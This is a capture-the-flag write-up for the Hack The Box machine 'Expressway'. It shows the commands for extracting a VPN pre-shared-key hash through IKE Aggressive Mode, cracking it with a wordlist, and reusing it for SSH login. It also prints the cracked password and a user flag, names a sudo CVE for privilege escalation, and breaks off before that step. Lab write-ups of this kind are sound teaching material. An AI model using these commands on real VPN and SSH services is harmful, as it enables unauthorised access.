Expressway — HackTheBox

Description

HackTheBox medium difficulty machine. Debian server with IPsec VPN (strongSwan) on UDP/500 and SSH on TCP/22. Initial access via PSK hash extraction from IKE Aggressive Mode and dictionary cracking, then password reuse for SSH. Privilege escalation through CVE-2025-32463 — a vulnerability in sudo 1.9.17 that allows loading an arbitrary shared library as root via nsswitch.conf substitution in a user-controlled chroot.

Reconnaissance

Port Scanning

Nmap discovered only 2 TCP ports:

• 22/tcp — SSH (OpenSSH 10.0p2 Debian)
• 53/tcp — unknown service (rabbit hole: connection establishes but any data causes "Network is down")

Key finding — UDP port 500 (IKE/ISAKMP):

nmap -sU -p 500 10.129.4.240
# 500/udp open isakmp

Analysis

IKE Enumeration

Probing the VPN service with ike-scan:

ike-scan 10.129.4.240

Result — IKEv1 Main Mode handshake with parameters:

• Encryption: 3DES
• Hash: SHA1
• DH Group: 2 (modp1024)
• Auth: PSK (Pre-Shared Key)
• XAUTH support
• Dead Peer Detection v1.0

Weak parameters (3DES + SHA1 + DH Group 2) and PSK authentication — classic vector for Aggressive Mode attack.

IKE Aggressive Mode — PSK Hash Extraction

IKEv1 Aggressive Mode transmits the PSK hash in cleartext (unlike Main Mode where identity is protected):

ike-scan --aggressive --id=vpn --pskcrack=ike_hash.txt 10.129.4.240

Server responded with Aggressive Mode handshake and revealed its identity:

• Server ID: [email protected] (ID_USER_FQDN)
• PSK hash saved to ike_hash.txt

PSK Cracking

psk-crack -d rockyou.txt ike_hash.txt

PSK: freakingrockstarontheroad

Solution

Step 1: User Access — SSH via Password Reuse

From IKE identity [email protected] extracted username ike. VPN PSK reused as SSH password:

sshpass -p 'freakingrockstarontheroad' ssh [email protected]

Successful login as ike (uid=1001, groups: ike, proxy).

cat /home/ike/user.txt
# d92ebe2ef753a2414aff0ba42be769c6

Step 2: Enumeration for Privilege Escalation

...